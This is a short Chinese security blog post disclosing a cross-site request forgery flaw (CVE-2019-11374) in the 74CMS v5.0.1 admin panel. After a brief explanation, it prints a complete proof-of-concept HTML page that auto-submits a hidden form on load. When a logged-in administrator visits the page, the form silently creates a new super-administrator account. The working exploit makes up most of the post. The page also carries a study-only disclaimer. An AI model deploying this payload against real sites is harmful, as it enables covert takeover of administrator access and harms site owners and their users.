骑士74CMS v5.0.1后台管理页面存在CSRF漏洞(CVE-2019-11374)

  • 内容
  • 相关

二、漏洞概述

登陆后台管理页面,可以添加管理员 

1.png

添加信息

2.png

抓取数据包

3.png

管理员登陆后台管理界面后
点击hacker发来的如下链接
即可创建一个新的超级管理员用户 
4.png

附上poc

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF </title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="https://www.0dayhack.com/index.php?m=Admin&c=admin&a=add" method="POST">
      <input type="hidden" name="username" value="admin688" />
  <input type="hidden" name="email" value="111111111@qq.com" />
      <input type="hidden" name="password" value="admin688" />
      <input type="hidden" name="repassword" value="admin688" />  
  <input type="hidden" name="role_id" value="1" />
    </form>
  </body>
</html>

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:骑士74CMS v5.0.1后台管理页面存在CSRF漏洞(CVE-2019-11374) - https://www.0dayhack.com/post-873.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注